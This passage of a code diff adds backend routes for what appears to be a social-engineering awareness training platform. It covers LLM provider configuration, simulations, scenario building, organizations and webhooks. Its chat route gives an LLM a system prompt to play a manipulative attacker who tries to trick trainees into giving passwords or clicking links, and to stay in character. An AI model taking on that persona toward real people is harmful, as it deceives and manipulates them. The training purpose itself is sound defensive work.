Start Ollama or LM Studio first.", + } + + if provider == "openrouter": + # Try to fetch live model list + config = await db.llm_configs.find_one({"provider": "openrouter"}, {"_id": 0}) + api_key = config.get("api_key", "") if config else "" + models = await fetch_openrouter_models(api_key) + if models: + return { + "provider": provider, + "models": models[:100], + "source": "live", + "total": len(models), + } + # Fallback to static catalog + return { + "provider": provider, + "models": PROVIDER_MODELS.get("openrouter", []), + "source": "static", + } + + # Static catalog for all other providers + models = get_provider_models(provider) + if not models: + raise HTTPException(status_code=404, detail=f"Unknown provider: {provider}") + return {"provider": provider, "models": models, "source": "static"} + + +@router.get("/models/{provider}/refresh") +async def refresh_models( + provider: str, + base_url: str = Query(None), + current_user: User = Depends(get_current_user), +): + """Force refresh model list (for local/openrouter).""" + if provider == "local": + url = base_url or LOCAL_DEFAULTS["ollama"] + models = await fetch_local_models(url) + return {"provider": provider, "models": models, "base_url": url} + + if provider == "openrouter": + config = await db.llm_configs.find_one({"provider": "openrouter"}, {"_id": 0}) + api_key = config.get("api_key", "") if config else "" + models = await fetch_openrouter_models(api_key) + return {"provider": provider, "models": models[:100], "total": len(models)} + + return {"provider": provider, "models": get_provider_models(provider)} + + +# ==================== CONFIG CRUD ==================== + + +@router.get("/config") +async def get_llm_configs(current_user: User = Depends(get_current_user)): + configs = await db.llm_configs.find({}, {"_id": 0}).to_list(100) + active_configs = [] + for config in configs: + # For local, api_key might be empty - that's OK + if config.get("provider") != "local" and ( + not config.get("api_key") or 
config.get("api_key") == "" + ): + continue + if config.get("api_key"): + config["api_key"] = "***" + config["updated_at"] = config.get("updated_at", datetime.now(UTC).isoformat()) + active_configs.append(config) + return active_configs + + +@router.post("/config") +async def save_llm_config(config: LLMConfig, current_user: User = Depends(get_current_user)): + doc = config.model_dump() + doc["updated_at"] = doc["updated_at"].isoformat() + + # For local provider, api_key is optional + if config.provider != "local" and (not config.api_key or config.api_key == ""): + await db.llm_configs.delete_one({"provider": config.provider}) + return {"message": "LLM config deleted"} + + await db.llm_configs.update_one( + {"provider": config.provider}, + {"$set": doc}, + upsert=True, + ) + + return {"message": "LLM config saved", "provider": config.provider, "model": config.model_name} + + +# ==================== GENERATION & CHAT ==================== + + +@router.post("/generate") +async def generate_pretext(request: dict[str, Any], current_user: User = Depends(get_current_user)): + """Generate pretext using LLM.""" + requested_provider = request.get("provider", None) + prompt = request.get("prompt", "") + context = request.get("context", {}) + + if requested_provider: + config = await db.llm_configs.find_one( + {"provider": requested_provider, "enabled": True}, {"_id": 0} + ) + else: + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + + if not config: + raise HTTPException( + status_code=400, + detail="LLM provider not configured or not enabled. 
Please configure in Settings.", + ) + + try: + response = await get_llm_generate_model(config, prompt, context) + sanitized = repair_json(response.content) + return { + "generated_text": sanitized, + "provider": config["provider"], + "model": config.get("model_name"), + } + + except Exception as e: + logger.error(f"LLM generation failed: {e}") + error_msg = str(e) + if "NOT_FOUND" in error_msg: + error_msg = ( + "Model not found. Your API Key might not support the selected model, " + "or the region is restricted." + ) + raise HTTPException(status_code=500, detail=f"LLM Generation Error: {error_msg}") + + +@router.post("/chat") +async def chat_interaction(request: dict[str, Any], current_user: User = Depends(get_current_user)): + """Real-time Chat Interaction for Roleplay.""" + history = request.get("history", []) + persona = request.get("persona", {}) + user_message = request.get("message", "") + + config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) + if not config: + raise HTTPException( + status_code=400, + detail="LLM config missing. Configure a provider in Settings.", + ) + + system_prompt = f"""You are a roleplay actor in a cybersecurity simulation. + Role: {persona.get("name", "Attacker")} + Goal: {persona.get("goal", "Trick the user")} + Personality: {persona.get("style", "Manipulative")} + Context: {persona.get("context", "Corporate Environment")} + + INSTRUCTIONS: + 1. Respond naturally as your character. Short, realistic messages (whatsapp/email style). + 2. Do NOT break character. + 3. If the user successfully spots the attack or refuses securely, + react accordingly (e.g. get angry, give up, or try a different angle). + 4. If the user FAILS (gives password, clicks link), + output a special marker in your text: [SUCCESS_ATTACK]. + 5. If the user permanently BLOCKS the attack, output: [ATTACK_FAILED]. 
+ """ + + messages = [SystemMessage(content=system_prompt)] + + for msg in history: + if msg["role"] == "user": + messages.append(HumanMessage(content=msg["content"])) + elif msg["role"] == "assistant": + messages.append(AIMessage(content=msg["content"])) + + messages.append(HumanMessage(content=user_message)) + + try: + response = await get_llm_chat_model(config, messages) + content = response.content + + status = "ongoing" + if "[SUCCESS_ATTACK]" in content: + status = "failed" + content = content.replace("[SUCCESS_ATTACK]", "") + elif "[ATTACK_FAILED]" in content: + status = "completed" + content = content.replace("[ATTACK_FAILED]", "") + + return { + "role": "assistant", + "content": content, + "status": status, + "provider": config["provider"], + "model": config.get("model_name"), + } + + except Exception as e: + logger.error(f"Chat error: {e}") + error_msg = str(e) + provider = config["provider"] + if "401" in error_msg: + error_msg = f"Unauthorized. Please check your API Key for {provider}." + elif "404" in error_msg: + error_msg = f"Model Not Found. Provider: {provider}." + elif "429" in error_msg: + error_msg = f"Rate Limit Exceeded. Please try again later. Provider: {provider}." + elif "Connection" in error_msg or "connect" in error_msg.lower(): + error_msg = f"Connection failed for {provider}. Is the server running?" 
+ raise HTTPException(status_code=500, detail=error_msg) diff --git a/backend/routes/notifications.py b/backend/routes/notifications.py new file mode 100644 index 0000000..f0ec687 --- /dev/null +++ b/backend/routes/notifications.py @@ -0,0 +1,49 @@ +from fastapi import APIRouter, Depends, Query + +from models.schemas import User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/notifications", tags=["notifications"]) + + +@router.get("") +async def get_notifications( + unread_only: bool = Query(False), + limit: int = Query(50, le=100), + current_user: User = Depends(get_current_user), +): + """Get user notifications.""" + query = {"user_id": current_user.id} + if unread_only: + query["read"] = False + + notifications = ( + await db.notifications.find(query, {"_id": 0}).sort("created_at", -1).to_list(limit) + ) + + unread_count = await db.notifications.count_documents( + {"user_id": current_user.id, "read": False} + ) + + return {"notifications": notifications, "unread_count": unread_count} + + +@router.put("/{notification_id}/read") +async def mark_read(notification_id: str, current_user: User = Depends(get_current_user)): + """Mark a notification as read.""" + await db.notifications.update_one( + {"id": notification_id, "user_id": current_user.id}, + {"$set": {"read": True}}, + ) + return {"message": "Marked as read"} + + +@router.put("/read-all") +async def mark_all_read(current_user: User = Depends(get_current_user)): + """Mark all notifications as read.""" + await db.notifications.update_many( + {"user_id": current_user.id, "read": False}, + {"$set": {"read": True}}, + ) + return {"message": "All notifications marked as read"} diff --git a/backend/routes/organizations.py b/backend/routes/organizations.py new file mode 100644 index 0000000..312d6af --- /dev/null +++ b/backend/routes/organizations.py @@ -0,0 +1,121 @@ +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from 
models.schemas import Organization, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/organizations", tags=["organizations"]) + + +@router.post("") +async def create_organization(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new organization.""" + org = Organization( + name=data["name"], + description=data.get("description", ""), + owner_id=current_user.id, + member_ids=[current_user.id], + ) + doc = org.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.organizations.insert_one(doc) + + # Update user's org + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": org.id, "role": "admin"}}, + ) + + # Award team player badge + if "team_player" not in current_user.badges: + from services.gamification import award_xp + + await db.users.update_one({"id": current_user.id}, {"$addToSet": {"badges": "team_player"}}) + await award_xp(current_user.id, 50) + + return {"id": org.id, "invite_code": org.invite_code, "message": "Organization created"} + + +@router.get("/mine") +async def get_my_organization(current_user: User = Depends(get_current_user)): + """Get current user's organization.""" + if not current_user.organization_id: + return None + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if not org: + return None + + # Get member details + members = await db.users.find( + {"id": {"$in": org.get("member_ids", [])}}, + {"_id": 0, "password_hash": 0}, + ).to_list(100) + + org["members"] = [ + { + "id": m["id"], + "username": m.get("username"), + "display_name": m.get("display_name"), + "role": m.get("role", "trainee"), + "level": m.get("level", 1), + "xp": m.get("xp", 0), + } + for m in members + ] + + return org + + +@router.post("/join") +async def join_organization(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Join an organization via invite 
code.""" + invite_code = data.get("invite_code", "") + org = await db.organizations.find_one({"invite_code": invite_code}, {"_id": 0}) + if not org: + raise HTTPException(status_code=404, detail="Invalid invite code") + + if current_user.id in org.get("member_ids", []): + raise HTTPException(status_code=400, detail="Already a member") + + await db.organizations.update_one( + {"id": org["id"]}, + {"$addToSet": {"member_ids": current_user.id}}, + ) + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": org["id"]}}, + ) + + # Award badge + if "team_player" not in current_user.badges: + from services.gamification import award_xp + + await db.users.update_one({"id": current_user.id}, {"$addToSet": {"badges": "team_player"}}) + await award_xp(current_user.id, 50) + + return {"message": f"Joined {org['name']}", "organization_id": org["id"]} + + +@router.delete("/leave") +async def leave_organization(current_user: User = Depends(get_current_user)): + """Leave current organization.""" + if not current_user.organization_id: + raise HTTPException(status_code=400, detail="Not in an organization") + + org = await db.organizations.find_one({"id": current_user.organization_id}, {"_id": 0}) + if org and org.get("owner_id") == current_user.id: + raise HTTPException(status_code=400, detail="Owner cannot leave. 
Transfer ownership first.") + + await db.organizations.update_one( + {"id": current_user.organization_id}, + {"$pull": {"member_ids": current_user.id}}, + ) + await db.users.update_one( + {"id": current_user.id}, + {"$set": {"organization_id": None}}, + ) + + return {"message": "Left organization"} diff --git a/backend/routes/quizzes.py b/backend/routes/quizzes.py new file mode 100644 index 0000000..d8e3b03 --- /dev/null +++ b/backend/routes/quizzes.py @@ -0,0 +1,21 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Quiz, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/quizzes", tags=["quizzes"]) + + +@router.get("", response_model=list[Quiz]) +async def get_quizzes(current_user: User = Depends(get_current_user)): + quizzes = await db.quizzes.find({}, {"_id": 0}).to_list(1000) + return quizzes + + +@router.get("/{quiz_id}", response_model=Quiz) +async def get_quiz(quiz_id: str, current_user: User = Depends(get_current_user)): + quiz = await db.quizzes.find_one({"id": quiz_id}, {"_id": 0}) + if not quiz: + raise HTTPException(status_code=404, detail="Quiz not found") + return quiz diff --git a/backend/routes/reports.py b/backend/routes/reports.py new file mode 100644 index 0000000..f924740 --- /dev/null +++ b/backend/routes/reports.py @@ -0,0 +1,26 @@ +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User +from services.auth import get_current_user +from services.database import db +from services.scoring import calculate_susceptibility_score + +router = APIRouter(prefix="/reports", tags=["reports"]) + + +@router.get("/{simulation_id}/json") +async def get_report_json(simulation_id: str, current_user: User = Depends(get_current_user)): + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + + score_data = 
calculate_susceptibility_score(sim) + + return { + "simulation_id": simulation_id, + "score": score_data, + "events": sim.get("events", []), + "started_at": sim.get("started_at"), + "completed_at": sim.get("completed_at"), + "participant_name": sim.get("participant_name"), + } diff --git a/backend/routes/scenario_builder.py b/backend/routes/scenario_builder.py new file mode 100644 index 0000000..3d94140 --- /dev/null +++ b/backend/routes/scenario_builder.py @@ -0,0 +1,129 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Challenge, ScenarioTemplate, User +from services.auth import get_current_user +from services.database import db +from services.gamification import award_xp + +router = APIRouter(prefix="/scenario-builder", tags=["scenario-builder"]) + + +@router.get("/templates") +async def get_my_templates(current_user: User = Depends(get_current_user)): + """Get user's scenario templates (drafts and published).""" + templates = ( + await db.scenario_templates.find({"created_by": current_user.id}, {"_id": 0}) + .sort("updated_at", -1) + .to_list(100) + ) + return templates + + +@router.get("/templates/{template_id}") +async def get_template(template_id: str, current_user: User = Depends(get_current_user)): + """Get a specific template.""" + template = await db.scenario_templates.find_one({"id": template_id}, {"_id": 0}) + if not template: + raise HTTPException(status_code=404, detail="Template not found") + return template + + +@router.post("/templates") +async def create_template(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a new scenario template (draft).""" + template = ScenarioTemplate( + title=data.get("title", "Untitled Scenario"), + description=data.get("description", ""), + difficulty=data.get("difficulty", "medium"), + cialdini_categories=data.get("cialdini_categories", []), + channel=data.get("channel", "email_inbox"), 
+ nodes=data.get("nodes", []), + metadata=data.get("metadata", {}), + content_en=data.get("content_en"), + content_id=data.get("content_id"), + created_by=current_user.id, + ) + doc = template.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + doc["updated_at"] = doc["updated_at"].isoformat() + await db.scenario_templates.insert_one(doc) + return {"id": template.id, "message": "Template created"} + + +@router.put("/templates/{template_id}") +async def update_template( + template_id: str, data: dict[str, Any], current_user: User = Depends(get_current_user) +): + """Update a scenario template.""" + existing = await db.scenario_templates.find_one( + {"id": template_id, "created_by": current_user.id} + ) + if not existing: + raise HTTPException(status_code=404, detail="Template not found") + + data["updated_at"] = datetime.now(UTC).isoformat() + await db.scenario_templates.update_one({"id": template_id}, {"$set": data}) + return {"message": "Template updated"} + + +@router.delete("/templates/{template_id}") +async def delete_template(template_id: str, current_user: User = Depends(get_current_user)): + """Delete a scenario template.""" + result = await db.scenario_templates.delete_one( + {"id": template_id, "created_by": current_user.id} + ) + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Template not found") + return {"message": "Template deleted"} + + +@router.post("/templates/{template_id}/publish") +async def publish_template(template_id: str, current_user: User = Depends(get_current_user)): + """Publish a template as a playable challenge.""" + template = await db.scenario_templates.find_one( + {"id": template_id, "created_by": current_user.id}, {"_id": 0} + ) + if not template: + raise HTTPException(status_code=404, detail="Template not found") + + if not template.get("nodes") or len(template["nodes"]) < 2: + raise HTTPException(status_code=400, detail="Scenario must have at least 2 nodes") + + # Create a challenge 
from the template + challenge = Challenge( + title=template["title"], + description=template["description"], + difficulty=template["difficulty"], + cialdini_categories=template.get("cialdini_categories", []), + estimated_time=len(template.get("nodes", [])) * 2, + nodes=template["nodes"], + metadata={ + **template.get("metadata", {}), + "author": current_user.username, + "source": "scenario_builder", + "template_id": template_id, + }, + content_en=template.get("content_en"), + content_id=template.get("content_id"), + ) + doc = challenge.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.challenges.insert_one(doc) + + # Mark template as published + await db.scenario_templates.update_one( + {"id": template_id}, + {"$set": {"is_published": True, "is_draft": False}}, + ) + + # Award badge + if "scenario_creator" not in current_user.badges: + await db.users.update_one( + {"id": current_user.id}, {"$addToSet": {"badges": "scenario_creator"}} + ) + await award_xp(current_user.id, 200) + + return {"challenge_id": challenge.id, "message": "Scenario published as challenge!"} diff --git a/backend/routes/settings.py b/backend/routes/settings.py new file mode 100644 index 0000000..4b71b16 --- /dev/null +++ b/backend/routes/settings.py @@ -0,0 +1,28 @@ +from typing import Any + +from fastapi import APIRouter, Depends + +from models.schemas import Settings, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/settings", tags=["settings"]) + + +@router.get("", response_model=Settings) +async def get_settings(current_user: User = Depends(get_current_user)): + settings = await db.settings.find_one({"id": "settings"}, {"_id": 0}) + if not settings: + settings = Settings().model_dump() + await db.settings.insert_one(settings) + return settings + + +@router.put("") +async def update_settings(updates: dict[str, Any], current_user: User = Depends(get_current_user)): + await db.settings.update_one( + 
{"id": "settings"}, + {"$set": updates}, + upsert=True, + ) + return {"message": "Settings updated"} diff --git a/backend/routes/simulations.py b/backend/routes/simulations.py new file mode 100644 index 0000000..5444657 --- /dev/null +++ b/backend/routes/simulations.py @@ -0,0 +1,59 @@ +from datetime import UTC, datetime +from typing import Any + +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import Simulation, User +from services.auth import get_current_user +from services.database import db + +router = APIRouter(prefix="/simulations", tags=["simulations"]) + + +@router.post("") +async def create_simulation(simulation: Simulation, current_user: User = Depends(get_current_user)): + doc = simulation.model_dump() + doc["started_at"] = doc["started_at"].isoformat() + if doc.get("completed_at"): + doc["completed_at"] = doc["completed_at"].isoformat() + await db.simulations.insert_one(doc) + return {"id": simulation.id, "status": "created"} + + +@router.get("", response_model=list[Simulation]) +async def get_simulations(current_user: User = Depends(get_current_user)): + sims = await db.simulations.find({}, {"_id": 0}).sort("started_at", -1).to_list(100) + return sims + + +@router.get("/{simulation_id}", response_model=Simulation) +async def get_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): + sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) + if not sim: + raise HTTPException(status_code=404, detail="Simulation not found") + return sim + + +@router.put("/{simulation_id}") +async def update_simulation( + simulation_id: str, updates: dict[str, Any], current_user: User = Depends(get_current_user) +): + if updates.get("completed_at"): + updates["completed_at"] = datetime.now(UTC).isoformat() + + result = await db.simulations.update_one({"id": simulation_id}, {"$set": updates}) + + if result.matched_count == 0: + raise HTTPException(status_code=404, detail="Simulation not found") + + return 
{"message": "Simulation updated"} + + +@router.delete("/{simulation_id}") +async def delete_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): + result = await db.simulations.delete_one({"id": simulation_id}) + + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Simulation not found") + + return {"message": "Simulation deleted successfully"} diff --git a/backend/routes/webhooks.py b/backend/routes/webhooks.py new file mode 100644 index 0000000..acaf08f --- /dev/null +++ b/backend/routes/webhooks.py @@ -0,0 +1,87 @@ +import logging +from typing import Any + +import httpx +from fastapi import APIRouter, Depends, HTTPException + +from models.schemas import User, WebhookConfig +from services.auth import get_current_user +from services.database import db + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/webhooks", tags=["webhooks"]) + + +@router.get("") +async def get_webhooks(current_user: User = Depends(get_current_user)): + """List configured webhooks.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + query = {} + if current_user.organization_id: + query["organization_id"] = current_user.organization_id + + webhooks = await db.webhooks.find(query, {"_id": 0}).to_list(50) + # Mask secrets + for wh in webhooks: + if wh.get("secret"): + wh["secret"] = "***" + return webhooks + + +@router.post("") +async def create_webhook(data: dict[str, Any], current_user: User = Depends(get_current_user)): + """Create a webhook configuration.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + webhook = WebhookConfig( + name=data["name"], + url=data["url"], + events=data.get("events", ["simulation_complete"]), + secret=data.get("secret"), + organization_id=current_user.organization_id, + ) + doc = webhook.model_dump() + doc["created_at"] = 
doc["created_at"].isoformat() + await db.webhooks.insert_one(doc) + return {"id": webhook.id, "message": "Webhook created"} + + +@router.delete("/{webhook_id}") +async def delete_webhook(webhook_id: str, current_user: User = Depends(get_current_user)): + """Delete a webhook.""" + if current_user.role not in ("admin", "instructor"): + raise HTTPException(status_code=403, detail="Insufficient permissions") + + result = await db.webhooks.delete_one({"id": webhook_id}) + if result.deleted_count == 0: + raise HTTPException(status_code=404, detail="Webhook not found") + return {"message": "Webhook deleted"} + + +async def fire_webhooks(event: str, payload: dict[str, Any], organization_id: str = None): + """Fire all matching webhooks for an event.""" + query = {"enabled": True, "events": event} + if organization_id: + query["organization_id"] = organization_id + + webhooks = await db.webhooks.find(query, {"_id": 0}).to_list(50) + + for wh in webhooks: + try: + async with httpx.AsyncClient(timeout=10) as client: + headers = {"Content-Type": "application/json"} + if wh.get("secret"): + headers["X-Webhook-Secret"] = wh["secret"] + + await client.post( + wh["url"], + json={"event": event, "data": payload}, + headers=headers, + ) + logger.info(f"Webhook fired: {wh['name']} -> {event}") + except Exception as e: + logger.error(f"Webhook failed: {wh['name']} -> {e}") diff --git a/backend/scripts/drop_yaml.py b/backend/scripts/drop_yaml.py index cd83320..e74b0f0 100644 --- a/backend/scripts/drop_yaml.py +++ b/backend/scripts/drop_yaml.py @@ -3,12 +3,14 @@ Script untuk menghapus (drop) koleksi-koleksi utama di MongoDB. Digunakan untuk membersihkan data aplikasi sebelum menjalankan seeding baru. 
""" + +import asyncio import os import sys -import asyncio from pathlib import Path -from motor.motor_asyncio import AsyncIOMotorClient + from dotenv import load_dotenv +from motor.motor_asyncio import AsyncIOMotorClient # Tambahkan direktori induk ke path untuk memastikan impor berfungsi sys.path.insert(0, str(Path(__file__).parent.parent)) @@ -17,19 +19,16 @@ load_dotenv() # Daftar koleksi yang akan dihapus -COLLECTIONS_TO_DROP = [ - "challenges", - "quizzes", - "simulations" -] +COLLECTIONS_TO_DROP = ["challenges", "quizzes", "simulations"] + async def drop_collections(): """Menghubungkan ke MongoDB dan menghapus koleksi yang ditentukan.""" try: # Dapatkan variabel lingkungan yang diperlukan - mongo_url = os.environ.get('MONGO_URL') - db_name = os.environ.get('DB_NAME') - + mongo_url = os.environ.get("MONGO_URL") + db_name = os.environ.get("DB_NAME") + if not mongo_url or not db_name: print("โŒ Error: MONGO_URL atau DB_NAME tidak ditemukan di environment variables.") sys.exit(1) @@ -37,7 +36,7 @@ async def drop_collections(): print(f"๐Ÿ”— Menghubungkan ke MongoDB di: {mongo_url}") client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + print(f"๐Ÿ—‘๏ธ Memulai penghapusan koleksi dari database '{db_name}'...") success_count = 0 @@ -50,14 +49,18 @@ async def drop_collections(): success_count += 1 else: print(f"โžก๏ธ Koleksi '{collection_name}' tidak ditemukan, dilewati.") - - print(f"\nโœจ Selesai. Total {success_count}/{len(COLLECTIONS_TO_DROP)} koleksi utama telah dihapus.") - + + print( + f"\nโœจ Selesai. Total {success_count}/" + f"{len(COLLECTIONS_TO_DROP)} koleksi utama telah dihapus." 
+ ) + client.close() - + except Exception as e: print(f"โŒ Terjadi kesalahan fatal selama operasi MongoDB: {e}") sys.exit(1) + if __name__ == "__main__": - asyncio.run(drop_collections()) \ No newline at end of file + asyncio.run(drop_collections()) diff --git a/backend/scripts/import_yaml.py b/backend/scripts/import_yaml.py index 107bf8f..32e87d1 100644 --- a/backend/scripts/import_yaml.py +++ b/backend/scripts/import_yaml.py @@ -2,14 +2,16 @@ """ Import YAML challenges and quizzes into MongoDB """ -import sys -import os -import yaml + import asyncio +import os +import sys +import uuid +from datetime import UTC, datetime from pathlib import Path + +import yaml from motor.motor_asyncio import AsyncIOMotorClient -from datetime import datetime, timezone -import uuid # Add parent directory to path sys.path.insert(0, str(Path(__file__).parent.parent)) @@ -19,84 +21,87 @@ # Load environment load_dotenv() + async def import_yaml_file(file_path: Path, db): """Import a single YAML file""" try: - with open(file_path, 'r', encoding='utf-8') as f: + with open(file_path, encoding="utf-8") as f: data = yaml.safe_load(f) - - yaml_type = data.get('type') - + + yaml_type = data.get("type") + if not yaml_type: print(f"โŒ {file_path.name}: No 'type' field") return False - + # Add ID and timestamp - data['id'] = str(uuid.uuid4()) - data['created_at'] = datetime.now(timezone.utc).isoformat() - - if yaml_type == 'challenge': + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(UTC).isoformat() + + if yaml_type == "challenge": await db.challenges.insert_one(data) print(f"โœ… Challenge: {data.get('title', 'Unknown')}") return True - - elif yaml_type == 'quiz': + + elif yaml_type == "quiz": await db.quizzes.insert_one(data) print(f"โœ… Quiz: {data.get('title', 'Unknown')}") return True - + else: print(f"โŒ {file_path.name}: Unknown type '{yaml_type}'") return False - + except Exception as e: print(f"โŒ {file_path.name}: {str(e)}") return False + async def main(): # 
Connect to MongoDB - mongo_url = os.environ['MONGO_URL'] - db_name = os.environ['DB_NAME'] - + mongo_url = os.environ["MONGO_URL"] + db_name = os.environ["DB_NAME"] + client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + # Get YAML directory if len(sys.argv) > 1: yaml_dir = Path(sys.argv[1]) else: - yaml_dir = Path(__file__).parent.parent.parent / 'data' / 'sample' - + yaml_dir = Path(__file__).parent.parent.parent / "data" / "sample" + if not yaml_dir.exists(): print(f"โŒ Directory not found: {yaml_dir}") sys.exit(1) - + # Find all YAML files - yaml_files = list(yaml_dir.glob('*.yaml')) + list(yaml_dir.glob('*.yml')) - + yaml_files = list(yaml_dir.glob("*.yaml")) + list(yaml_dir.glob("*.yml")) + if not yaml_files: print(f"โŒ No YAML files found in {yaml_dir}") sys.exit(1) - + print(f"\n๐Ÿ” Found {len(yaml_files)} YAML files\n") - + # Import each file success_count = 0 for yaml_file in sorted(yaml_files): if await import_yaml_file(yaml_file, db): success_count += 1 - + print(f"\nโœ… Imported {success_count}/{len(yaml_files)} files\n") - + # Show stats challenge_count = await db.challenges.count_documents({}) quiz_count = await db.quizzes.count_documents({}) - - print(f"๐Ÿ“Š Database stats:") + + print("๐Ÿ“Š Database stats:") print(f" Challenges: {challenge_count}") print(f" Quizzes: {quiz_count}") - + client.close() -if __name__ == '__main__': + +if __name__ == "__main__": asyncio.run(main()) diff --git a/backend/scripts/simple_import.py b/backend/scripts/simple_import.py index f0384b0..75b91ad 100644 --- a/backend/scripts/simple_import.py +++ b/backend/scripts/simple_import.py @@ -1,33 +1,37 @@ -import sys -import os -import yaml import asyncio -from pathlib import Path -from motor.motor_asyncio import AsyncIOMotorClient +import datetime as dt +import os +import sys import uuid from datetime import datetime -import datetime as dt +from pathlib import Path + +import yaml +from motor.motor_asyncio import AsyncIOMotorClient + async def 
import_yaml_file(file_path: Path, db): try: - with open(file_path, 'r', encoding='utf-8') as f: + with open(file_path, encoding="utf-8") as f: data = yaml.safe_load(f) - - yaml_type = data.get('type') + + yaml_type = data.get("type") if not yaml_type: print(f"[ERROR] {file_path.name}: No 'type' field") return False - - # Add ID if not present (or overwrite to ensure uniqueness if needed, but keeping existing ID is better if simulating updates) + + # Add ID if not present (or overwrite to ensure + # uniqueness if needed, but keeping existing ID is + # better if simulating updates) # For now, just generate new ID to be safe - data['id'] = str(uuid.uuid4()) - data['created_at'] = datetime.now(dt.timezone.utc).isoformat() - - if yaml_type == 'challenge': + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(dt.UTC).isoformat() + + if yaml_type == "challenge": await db.challenges.insert_one(data) print(f"[OK] Challenge: {data.get('title', 'Unknown')}") return True - elif yaml_type == 'quiz': + elif yaml_type == "quiz": await db.quizzes.insert_one(data) print(f"[OK] Quiz: {data.get('title', 'Unknown')}") return True @@ -38,35 +42,37 @@ async def import_yaml_file(file_path: Path, db): print(f"[ERROR] {file_path.name}: {str(e)}") return False + async def main(): mongo_url = os.environ.get("MONGO_URL", "mongodb://localhost:27017") db_name = os.environ.get("DB_NAME", "Pretexta") - + print(f"Connecting to {mongo_url}/{db_name}...") client = AsyncIOMotorClient(mongo_url) db = client[db_name] - + # Target directory: relative to this script in backend/scripts -> ../../data/professionals # Script is in backend/scripts base_dir = Path(__file__).parent.parent.parent - yaml_dir = base_dir / 'data' / 'professionals' - + yaml_dir = base_dir / "data" / "professionals" + if not yaml_dir.exists(): print(f"Directory not found: {yaml_dir}") return - files = list(yaml_dir.glob('**/*.yaml')) + files = list(yaml_dir.glob("**/*.yaml")) print(f"Found {len(files)} YAML files.") - 
+ count = 0 for f in files: if await import_yaml_file(f, db): count += 1 - + print(f"Imported {count} files.") client.close() -if __name__ == '__main__': + +if __name__ == "__main__": # Force utf-8 output for windows - sys.stdout.reconfigure(encoding='utf-8') + sys.stdout.reconfigure(encoding="utf-8") asyncio.run(main()) diff --git a/backend/scripts/validate_yaml.py b/backend/scripts/validate_yaml.py index 9832cb8..52b4f99 100644 --- a/backend/scripts/validate_yaml.py +++ b/backend/scripts/validate_yaml.py @@ -1,18 +1,20 @@ -import sys -import yaml import json +import sys from pathlib import Path -from jsonschema import validate, exceptions + +import yaml +from jsonschema import exceptions, validate # Lokasi skema diasumsikan berada di direktori yang sama dengan script ini SCHEMA_DIR = Path(__file__).parent -CHALLENGE_SCHEMA_PATH = SCHEMA_DIR / 'challenge_schema.json' -QUIZ_SCHEMA_PATH = SCHEMA_DIR / 'quiz_schema.json' +CHALLENGE_SCHEMA_PATH = SCHEMA_DIR / "challenge_schema.json" +QUIZ_SCHEMA_PATH = SCHEMA_DIR / "quiz_schema.json" + def load_schema(schema_path: Path): """Memuat skema JSON dari file.""" try: - with open(schema_path, 'r', encoding='utf-8') as f: + with open(schema_path, encoding="utf-8") as f: return json.load(f) except FileNotFoundError: print(f"โŒ Error: Skema tidak ditemukan di {schema_path}. Pastikan file skema JSON ada.") @@ -21,6 +23,7 @@ def load_schema(schema_path: Path): print(f"โŒ Error saat memuat skema JSON dari {schema_path}: {e}") sys.exit(1) + def validate_yaml_file(yaml_file_path: Path): """Memuat dan memvalidasi file YAML terhadap skema yang sesuai.""" if not yaml_file_path.exists(): @@ -28,24 +31,30 @@ def validate_yaml_file(yaml_file_path: Path): sys.exit(1) try: - with open(yaml_file_path, 'r', encoding='utf-8') as f: + with open(yaml_file_path, encoding="utf-8") as f: data = yaml.safe_load(f) except yaml.YAMLError as e: - print(f"โŒ Error: Gagal mem-parsing file YAML '{yaml_file_path.name}'. 
